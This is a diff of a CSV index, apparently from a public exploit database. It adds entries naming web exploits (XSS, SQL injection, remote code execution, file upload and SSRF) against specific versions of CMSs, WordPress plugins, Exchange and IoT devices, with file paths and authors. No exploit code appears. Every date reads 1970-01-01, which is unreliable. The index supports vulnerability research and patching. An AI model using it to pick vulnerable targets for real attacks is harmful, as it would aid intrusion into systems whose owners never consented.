49785,exploits/hardware/webapps/49785.txt,"Adtran Personal Phone Manager 10.8.1 - 'emailAddress' Stored Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,hardware,
49786,exploits/hardware/webapps/49786.txt,"Adtran Personal Phone Manager 10.8.1 - 'Multiple' Reflected Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,hardware,
49787,exploits/hardware/webapps/49787.txt,"Adtran Personal Phone Manager 10.8.1 - DNS Exfiltration",1970-01-01,3ndG4me,webapps,hardware,
+49788,exploits/php/webapps/49788.rb,"GravCMS 1.10.7 - Unauthenticated Arbitrary File Write (Metasploit)",1970-01-01,"Mehmet Ince",webapps,php,
49790,exploits/multiple/webapps/49790.py,"Hasura GraphQL 1.3.3 - Local File Read",1970-01-01,"Dolev Farhi",webapps,multiple,
49791,exploits/multiple/webapps/49791.py,"Hasura GraphQL 1.3.3 - Service Side Request Forgery (SSRF)",1970-01-01,"Dolev Farhi",webapps,multiple,
49793,exploits/php/webapps/49793.txt,"CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)",1970-01-01,bt0,webapps,php,
@@ -44033,19 +44071,34 @@ id,file,description,date,author,type,platform,port
49797,exploits/php/webapps/49797.txt,"Moodle 3.10.3 - 'url' Persistent Cross Site Scripting",1970-01-01,UVision,webapps,php,
49799,exploits/multiple/webapps/49799.py,"DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple,
49800,exploits/hardware/webapps/49800.html,"Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,webapps,hardware,
+50462,exploits/aspx/webapps/50462.txt,"Umbraco v8.14.1 - 'baseUrl' SSRF",1970-01-01,NgoAnhDuc,webapps,aspx,
49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware,
49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",1970-01-01,"Fellipe Oliveira",webapps,python,
49804,exploits/php/webapps/49804.py,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2)",1970-01-01,nu11secur1ty,webapps,php,
49805,exploits/php/webapps/49805.txt,"Kimai 1.14 - CSV Injection",1970-01-01,"Mohammed Aloraimi",webapps,php,
49808,exploits/php/webapps/49808.txt,"Kirby CMS 3.5.3.1 - 'file' Cross-Site Scripting (XSS)",1970-01-01,"Sreenath Raghunathan",webapps,php,
+49810,exploits/php/webapps/49810.py,"Cacti 1.2.12 - 'filter' SQL Injection",1970-01-01,"Leonardo Paiva",webapps,php,
49811,exploits/php/webapps/49811.txt,"FOGProject 1.5.9 - File Upload RCE (Authenticated)",1970-01-01,sml,webapps,php,
49813,exploits/multiple/webapps/49813.py,"NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write",1970-01-01,1F98D,webapps,multiple,
49814,exploits/php/webapps/49814.txt,"Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)",1970-01-01,"Fariskhi Vidyan",webapps,php,
+49816,exploits/php/webapps/49816.py,"GetSimple CMS Custom JS 0.1 - Cross-Site Request Forgery",1970-01-01,boku,webapps,php,
49817,exploits/php/webapps/49817.txt,"Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection)",1970-01-01,"Syed Sheeraz Ali",webapps,php,
49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",1970-01-01,nu11secur1ty,webapps,php,
49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",1970-01-01,4D0niiS,webapps,ruby,
49822,exploits/ruby/webapps/49822.txt,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",1970-01-01,4D0niiS,webapps,ruby,
+49823,exploits/php/webapps/49823.py,"Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated)",1970-01-01,argenestel,webapps,php,
49825,exploits/php/webapps/49825.txt,"Savsoft Quiz 5 - 'User Account Settings' Persistent Cross-Site Scripting",1970-01-01,strider,webapps,php,
+49826,exploits/multiple/webapps/49826.js,"Markdown Explorer 0.1.1 - Persistent Cross-Site Scripting",1970-01-01,"Taurus Omar",webapps,multiple,
+49827,exploits/multiple/webapps/49827.js,"Xmind 2020 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
+49828,exploits/multiple/webapps/49828.js,"Tagstoo 2.0.1 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
+49829,exploits/multiple/webapps/49829.js,"SnipCommand 0.1.0 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
+49830,exploits/multiple/webapps/49830.js,"Moeditor 0.2.0 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
+49831,exploits/multiple/webapps/49831.js,"Marky 0.0.1 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
+49832,exploits/multiple/webapps/49832.js,"StudyMD 0.3.2 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
+49833,exploits/multiple/webapps/49833.js,"Freeter 1.2.1 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
+49834,exploits/multiple/webapps/49834.js,"Markright 1.0 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
+49835,exploits/multiple/webapps/49835.js,"Markdownify 1.2.0 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
+49836,exploits/multiple/webapps/49836.js,"Anote 1.0 - Persistent Cross-Site Scripting",1970-01-01,TaurusOmar,webapps,multiple,
49837,exploits/multiple/webapps/49837.txt,"Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)",1970-01-01,"Emircan Baş",webapps,multiple,
49838,exploits/multiple/webapps/49838.txt,"Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)",1970-01-01,"Eren Saraç",webapps,multiple,
49839,exploits/php/webapps/49839.txt,"Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload",1970-01-01,h4shur,webapps,php,
@@ -44072,6 +44125,8 @@ id,file,description,date,author,type,platform,port
49873,exploits/php/webapps/49873.txt,"Simple Chatbot Application 1.0 - 'Category' Stored Cross site Scripting",1970-01-01,"Vani K G",webapps,php,
49874,exploits/php/webapps/49874.txt,"Billing Management System 2.0 - Union based SQL injection (Authenticated)",1970-01-01,"Mohammad Koochaki",webapps,php,
49875,exploits/php/webapps/49875.txt,"Advanced Guestbook 2.4.4 - 'Smilies' Persistent Cross-Site Scripting (XSS)",1970-01-01,"Abdulkadir AYDOGAN",webapps,php,
+49876,exploits/php/webapps/49876.py,"Subrion CMS 4.2.1 - Arbitrary File Upload",1970-01-01,"Fellipe Oliveira",webapps,php,
+49877,exploits/php/webapps/49877.txt,"Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection",1970-01-01,bwnz,webapps,php,
49878,exploits/php/webapps/49878.txt,"EgavilanMedia PHPCRUD 1.0 - 'First Name' SQL Injection",1970-01-01,"Dimitrios Mitakos",webapps,php,
49879,exploits/windows/webapps/49879.py,"Microsoft Exchange 2019 - Unauthenticated Email Download",1970-01-01,"Gonzalo Villegas",webapps,windows,
49880,exploits/php/webapps/49880.txt,"WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)",1970-01-01,"Hosein Vita",webapps,php,
@@ -44082,6 +44137,7 @@ id,file,description,date,author,type,platform,port
49891,exploits/multiple/webapps/49891.txt,"Spotweb 1.4.9 - DOM Based Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple,
49894,exploits/php/webapps/49894.sh,"WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)",1970-01-01,"Mansoor R",webapps,php,
49895,exploits/windows/webapps/49895.rb,"Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)",1970-01-01,mekhalleh,webapps,windows,
+49897,exploits/multiple/webapps/49897.txt,"Schlix CMS 2.2.6-6 - Arbitary File Upload (Authenticated)",1970-01-01,"Emir Polat",webapps,multiple,
49901,exploits/java/webapps/49901.txt,"Shopizer 2.16.0 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,"Marek Toth",webapps,java,
49902,exploits/multiple/webapps/49902.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (2)",1970-01-01,"Ron Jost",webapps,multiple,
49903,exploits/php/webapps/49903.txt,"WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)",1970-01-01,"Bastijn Ouwendijk",webapps,php,
@@ -44094,6 +44150,7 @@ id,file,description,date,author,type,platform,port
49912,exploits/php/webapps/49912.txt,"WordPress Plugin LifterLMS 4.21.0 - Stored Cross-Site Scripting (XSS)",1970-01-01,Captain_hook,webapps,php,
49913,exploits/php/webapps/49913.py,"Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated)",1970-01-01,"Ron Jost",webapps,php,
49914,exploits/php/webapps/49914.py,"Trixbox 2.8.0.4 - 'lang' Path Traversal",1970-01-01,"Ron Jost",webapps,php,
+49915,exploits/linux/webapps/49915.rb,"Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver)",1970-01-01,"Jon Stratton",webapps,linux,
49918,exploits/multiple/webapps/49918.py,"LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)",1970-01-01,g0ldm45k,webapps,multiple,
49919,exploits/php/webapps/49919.txt,"ProjeQtOr Project Management 9.1.4 - Remote Code Execution",1970-01-01,"Temel Demir",webapps,php,
49920,exploits/hardware/webapps/49920.html,"Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF)",1970-01-01,lated,webapps,hardware,
@@ -44109,6 +44166,7 @@ id,file,description,date,author,type,platform,port
49932,exploits/php/webapps/49932.txt,"Seo Panel 4.8.0 - 'category' Reflected XSS",1970-01-01,"Piyush Patil",webapps,php,
49933,exploits/php/webapps/49933.py,"PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution",1970-01-01,flast101,webapps,php,
49935,exploits/php/webapps/49935.txt,"Seo Panel 4.8.0 - 'from_time' Reflected XSS",1970-01-01,"Piyush Patil",webapps,php,
+49937,exploits/hardware/webapps/49937.txt,"CHIYU IoT Devices - Denial of Service (DoS)",1970-01-01,sirpedrotavares,webapps,hardware,
50062,exploits/php/webapps/50062.py,"Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated)",1970-01-01,"Bryan Leong",webapps,php,
49942,exploits/php/webapps/49942.txt,"FUDForum 3.1.0 - 'srch' Reflected XSS",1970-01-01,"Piyush Patil",webapps,php,
49943,exploits/php/webapps/49943.txt,"FUDForum 3.1.0 - 'author' Reflected XSS",1970-01-01,"Piyush Patil",webapps,php,
@@ -44137,6 +44195,7 @@ id,file,description,date,author,type,platform,port
49985,exploits/multiple/webapps/49985.txt,"Grocery crud 1.6.4 - 'order_by' SQL Injection",1970-01-01,TonyShavez,webapps,multiple,
49986,exploits/multiple/webapps/49986.txt,"Solar-Log 500 2.8.2 - Incorrect Access Control",1970-01-01,Luca.Chiou,webapps,multiple,
49987,exploits/multiple/webapps/49987.txt,"Solar-Log 500 2.8.2 - Unprotected Storage of Credentials",1970-01-01,Luca.Chiou,webapps,multiple,
+49988,exploits/php/webapps/49988.txt,"Zenario CMS 8.8.52729 - 'cID' SQL injection (Authenticated)",1970-01-01,"Avinash R",webapps,php,
49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",1970-01-01,securityforeveryone.com,webapps,php,
49990,exploits/multiple/webapps/49990.txt,"Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)",1970-01-01,"Abdulazeez Alaseeri",webapps,multiple,
49991,exploits/multiple/webapps/49991.txt,"Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)",1970-01-01,"Abdulazeez Alaseeri",webapps,multiple,
@@ -44144,6 +44203,7 @@ id,file,description,date,author,type,platform,port
49993,exploits/php/webapps/49993.txt,"COVID19 Testing Management System 1.0 - 'State' Stored Cross-Site-Scripting (XSS)",1970-01-01,"BHAVESH KAUL",webapps,php,
49994,exploits/php/webapps/49994.txt,"Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated)",1970-01-01,"Riadh Benlamine",webapps,php,
49995,exploits/php/webapps/49995.txt,"Small CRM 3.0 - 'Authentication Bypass' SQL Injection",1970-01-01,"BHAVESH KAUL",webapps,php,
+49996,exploits/php/webapps/49996.txt,"TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)",1970-01-01,"Mert Daş",webapps,php,
49998,exploits/php/webapps/49998.py,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
50007,exploits/php/webapps/50007.txt,"Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)",1970-01-01,"BHAVESH KAUL",webapps,php,
50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",1970-01-01,"BHAVESH KAUL",webapps,tru64,
@@ -44177,11 +44237,13 @@ id,file,description,date,author,type,platform,port
50057,exploits/cfm/webapps/50057.py,"Adobe ColdFusion 8 - Remote Command Execution (RCE)",1970-01-01,Pergyz,webapps,cfm,
50058,exploits/hardware/webapps/50058.py,"TP-Link TL-WR841N - Command Injection",1970-01-01,"Koh You Liang",webapps,hardware,
50108,exploits/linux/webapps/50108.py,"Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2)",1970-01-01,enox,webapps,linux,
+50107,exploits/php/webapps/50107.py,"WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal",1970-01-01,TheSmuggler,webapps,php,
50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",1970-01-01,"Barış Yıldızoğlu",webapps,php,
50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",1970-01-01,"Maide Ilkay Aydogdu",webapps,php,
50066,exploits/php/webapps/50066.txt,"WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)",1970-01-01,"Toby Jackson",webapps,php,
50075,exploits/php/webapps/50075.txt,"Online Voting System 1.0 - Authentication Bypass (SQLi)",1970-01-01,"Salman Asad",webapps,php,
50074,exploits/php/webapps/50074.txt,"Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)",1970-01-01,"Murat DEMİRCİ",webapps,php,
+50068,exploits/macos/webapps/50068.txt,"Atlassian Jira Server Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)",1970-01-01,Captain_hook,webapps,macos,
50069,exploits/hardware/webapps/50069.py,"Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Bryan Leong",webapps,hardware,
50071,exploits/php/webapps/50071.py,"phpAbook 0.9i - SQL Injection",1970-01-01,"Alejandro Perez",webapps,php,
50072,exploits/multiple/webapps/50072.py,"Apache Superset 1.1.0 - Time-Based Account Enumeration",1970-01-01,"Dolev Farhi",webapps,multiple,
@@ -44189,6 +44251,7 @@ id,file,description,date,author,type,platform,port
50076,exploits/php/webapps/50076.txt,"Online Voting System 1.0 - Remote Code Execution (Authenticated)",1970-01-01,"Salman Asad",webapps,php,
50077,exploits/php/webapps/50077.py,"Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",1970-01-01,"Audencia Business SCHOOL Red Team",webapps,multiple,
+50079,exploits/multiple/webapps/50079.txt,"Scratch Desktop 3.17 - Remote Code Execution",1970-01-01,"Stig Magnus Baugstø",webapps,multiple,
50080,exploits/hardware/webapps/50080.txt,"AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,"Tyler Butler",webapps,hardware,
50081,exploits/php/webapps/50081.txt,"b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)",1970-01-01,"Alperen Ergel",webapps,php,
50082,exploits/php/webapps/50082.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
@@ -44198,6 +44261,7 @@ id,file,description,date,author,type,platform,port
50087,exploits/php/webapps/50087.rb,"OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)",1970-01-01,"Alexandre ZANNI",webapps,php,
50088,exploits/php/webapps/50088.py,"Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)",1970-01-01,Geiseric,webapps,php,
50089,exploits/php/webapps/50089.txt,"Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Subhadip Nag",webapps,php,
+50090,exploits/php/webapps/50090.txt,"Church Management System 1.0 - Arbitrary File Upload (Authenticated)",1970-01-01,"Murat DEMİRCİ",webapps,php,
50091,exploits/php/webapps/50091.txt,"Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
50092,exploits/php/webapps/50092.txt,"Church Management System 1.0 - 'password' SQL Injection (Authentication Bypass)",1970-01-01,"Murat DEMİRCİ",webapps,php,
50093,exploits/php/webapps/50093.py,"Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
@@ -44213,6 +44277,7 @@ id,file,description,date,author,type,platform,port
50103,exploits/php/webapps/50103.php,"Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated)",1970-01-01,"Thamer Almohammadi",webapps,php,
50104,exploits/hardware/webapps/50104.txt,"Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation",1970-01-01,"Andrea D\'Ubaldo",webapps,hardware,
50105,exploits/php/webapps/50105.txt,"Phone Shop Sales Managements System 1.0 - Authentication Bypass (SQLi)",1970-01-01,faisalfs10x,webapps,php,
+50106,exploits/php/webapps/50106.txt,"Phone Shop Sales Managements System 1.0 - Arbitrary File Upload",1970-01-01,faisalfs10x,webapps,php,
50109,exploits/php/webapps/50109.txt,"Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection",1970-01-01,faisalfs10x,webapps,php,
50110,exploits/php/webapps/50110.py,"WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)",1970-01-01,"Beren Kuday GÖRÜN",webapps,php,
50111,exploits/php/webapps/50111.py,"Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)",1970-01-01,"Davide \'yth1n\' Bianchin",webapps,php,
@@ -44221,14 +44286,17 @@ id,file,description,date,author,type,platform,port
50114,exploits/php/webapps/50114.py,"Online Covid Vaccination Scheduler System 1.0 - Arbitrary File Upload to Remote Code Execution (Unauthenticated)",1970-01-01,faisalfs10x,webapps,php,
50115,exploits/php/webapps/50115.py,"Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",1970-01-01,"Eleonora Guardini",webapps,php,
+50117,exploits/php/webapps/50117.txt,"Zoo Management System 1.0 - 'Multiple' Persistent Cross-Site-Scripting (XSS)",1970-01-01,"Subhadip Nag",webapps,php,
50118,exploits/multiple/webapps/50118.txt,"Apache Tomcat 9.0.0.M1 - Open Redirect",1970-01-01,"Central InfoSec",webapps,multiple,
50120,exploits/php/webapps/50120.txt,"WordPress Plugin WPFront Notification Bar 1.9.1.04012 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Swapnil Subhash Bodekar",webapps,php,
50119,exploits/multiple/webapps/50119.txt,"Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)",1970-01-01,"Central InfoSec",webapps,multiple,
50121,exploits/php/webapps/50121.txt,"Invoice System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Subhadip Nag",webapps,php,
50122,exploits/php/webapps/50122.rb,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)",1970-01-01,"Alexandre ZANNI",webapps,php,
50123,exploits/php/webapps/50123.py,"Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload",1970-01-01,"Luca Bernardi",webapps,php,
+50127,exploits/php/webapps/50127.txt,"WordPress Plugin Current Book 1.0.1 - 'Book Title' Persistent Cross-Site Scripting",1970-01-01,"Vikas Srivastava",webapps,php,
50128,exploits/php/webapps/50128.py,"osCommerce 2.3.4.1 - Remote Code Execution (2)",1970-01-01,"Bryan Leong",webapps,php,
50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Simone Cristofaro",webapps,php,
+50131,exploits/java/webapps/50131.py,"ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Photubias,webapps,java,
50132,exploits/hardware/webapps/50132.py,"Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection",1970-01-01,"Metin Yunus Kandemir",webapps,hardware,
50137,exploits/php/webapps/50137.txt,"WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)",1970-01-01,nhattruong,webapps,php,
50138,exploits/php/webapps/50138.txt,"WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation",1970-01-01,nhattruong,webapps,php,
@@ -44236,6 +44304,7 @@ id,file,description,date,author,type,platform,port
50142,exploits/php/webapps/50142.txt,"PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection",1970-01-01,faisalfs10x,webapps,php,
50143,exploits/php/webapps/50143.txt,"WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS)",1970-01-01,"Aakash Choudhary",webapps,php,
50144,exploits/linux/webapps/50144.py,"Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)",1970-01-01,Mesh3l_911,webapps,linux,
+50146,exploits/hardware/webapps/50146.txt,"KevinLAB BEMS 1.0 - Authentication Bypass",1970-01-01,LiquidWorm,webapps,hardware,
50147,exploits/hardware/webapps/50147.txt,"KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated)",1970-01-01,LiquidWorm,webapps,hardware,
50148,exploits/php/webapps/50148.txt,"CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion",1970-01-01,faisalfs10x,webapps,php,
50149,exploits/multiple/webapps/50149.py,"ElasticSearch 7.13.3 - Memory disclosure",1970-01-01,r0ny,webapps,multiple,
@@ -44245,18 +44314,24 @@ id,file,description,date,author,type,platform,port
50155,exploits/php/webapps/50155.txt,"XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated)",1970-01-01,faisalfs10x,webapps,php,
50156,exploits/php/webapps/50156.py,"PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection",1970-01-01,S1lv3r,webapps,php,
50158,exploits/php/webapps/50158.txt,"Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass",1970-01-01,Shafique_Wasta,webapps,php,
+50159,exploits/php/webapps/50159.py,"Event Registration System with QR Code 1.0 - Authentication Bypass",1970-01-01,"Javier Olmedo",webapps,php,
50161,exploits/windows/webapps/50161.txt,"TripSpark VEO Transportation - Blind SQL Injection",1970-01-01,"Sedric Louissaint",webapps,windows,
50162,exploits/hardware/webapps/50162.txt,"Denver IP Camera SHO-110 - Unauthenticated Snapshot",1970-01-01,"Ivan Nikolsky",webapps,hardware,
50163,exploits/hardware/webapps/50163.txt,"Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download",1970-01-01,LiquidWorm,webapps,hardware,
50164,exploits/aspx/webapps/50164.txt,"IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration",1970-01-01,LiquidWorm,webapps,aspx,
50165,exploits/php/webapps/50165.txt,"Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection",1970-01-01,securityforeveryone.com,webapps,php,
+50166,exploits/java/webapps/50166.py,"CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF)",1970-01-01,niebardzo,webapps,java,
50167,exploits/multiple/webapps/50167.txt,"Oracle Fatwire 6.3 - Multiple Vulnerabilities",1970-01-01,"J. Francisco Bolivar",webapps,multiple,
50169,exploits/php/webapps/50169.txt,"Men Salon Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Akshay Khanna",webapps,php,
50171,exploits/php/webapps/50171.txt,"Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting (XSS)",1970-01-01,"Mohammad Koochaki",webapps,php,
+50172,exploits/hardware/webapps/50172.txt,"Panasonic Sanyo CCTV Network Camera 2.03-0x - Cross-Site Request Forgery (Change Password)",1970-01-01,LiquidWorm,webapps,hardware,
50173,exploits/php/webapps/50173.py,"Hotel Management System 1.0 - Cross-Site Scripting (XSS) Arbitrary File Upload Remote Code Execution (RCE)",1970-01-01,"Merbin Russel",webapps,php,
50174,exploits/php/webapps/50174.txt,"WordPress Plugin WP Customize Login 1.1 - 'Change Logo Title' Stored Cross-Site Scripting (XSS)",1970-01-01,"Aryan Chehreghani",webapps,php,
50175,exploits/php/webapps/50175.py,"qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Leon Trappett",webapps,php,
+50176,exploits/php/webapps/50176.txt,"qdPM 9.2 - Password Exposure (Unauthenticated)",1970-01-01,"Leon Trappett",webapps,php,
50177,exploits/php/webapps/50177.txt,"Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)",1970-01-01,"Mohammad Koochaki",webapps,php,
+50178,exploits/java/webapps/50178.sh,"ApacheOfBiz 17.12.01 - Remote Command Execution (RCE)",1970-01-01,"Adrián Díaz",webapps,java,
+50464,exploits/cgi/webapps/50464.rb,"Movable Type 7 r.5002 - XMLRPC API OS Command Injection (Metasploit)",1970-01-01,"Charl-Alexandre Le Brun",webapps,cgi,
50179,exploits/php/webapps/50179.txt,"CMSuno 1.7 - 'tgo' Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,splint3rsec,webapps,php,
50180,exploits/php/webapps/50180.py,"Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,lanz,webapps,php,
50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",1970-01-01,"Amin Bohio",webapps,multiple,
@@ -44281,12 +44356,14 @@ id,file,description,date,author,type,platform,port
50208,exploits/hardware/webapps/50208.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - RTSP Credentials Disclosure",1970-01-01,LiquidWorm,webapps,hardware,
50209,exploits/hardware/webapps/50209.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
50210,exploits/hardware/webapps/50210.txt,"COMMAX CVD-Axx DVR 5.1.4 - Weak Default Credentials Stream Disclosure",1970-01-01,LiquidWorm,webapps,hardware,
+50211,exploits/hardware/webapps/50211.txt,"GeoVision Geowebserver 5.3.3 - Local FIle Inclusion",1970-01-01,"Ken Pyle",webapps,hardware,
50213,exploits/php/webapps/50213.txt,"Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",1970-01-01,"Davide Taraschi",webapps,php,
50214,exploits/php/webapps/50214.py,"Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Tagoletta,webapps,php,
50215,exploits/php/webapps/50215.txt,"COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections",1970-01-01,"Halit AKAYDIN",webapps,php,
50217,exploits/php/webapps/50217.txt,"Charity Management System CMS 1.0 - Multiple Vulnerabilities",1970-01-01,"Davide Taraschi",webapps,php,
50220,exploits/php/webapps/50220.txt,"Laundry Booking Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Azumah Foresight Xorlali",webapps,php,
50221,exploits/php/webapps/50221.py,"Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
+50223,exploits/php/webapps/50223.txt,"Simple Phone Book 1.0 - 'Username' SQL Injection (Unauthenticated)",1970-01-01,"Justin White",webapps,php,
50224,exploits/php/webapps/50224.py,"RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Moritz Gruber",webapps,php,
50226,exploits/php/webapps/50226.py,"WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)",1970-01-01,"Matheus Alexandre",webapps,php,
50227,exploits/hardware/webapps/50227.py,"HP OfficeJet 4630/7110 MYM1FN2025AR/2117A - Stored Cross-Site Scripting (XSS)",1970-01-01,"Tyler Butler",webapps,hardware,
@@ -44302,10 +44379,14 @@ id,file,description,date,author,type,platform,port
50238,exploits/multiple/webapps/50238.py,"Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"David Utón",webapps,multiple,
50239,exploits/multiple/webapps/50239.py,"Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Musyoka Ian",webapps,multiple,
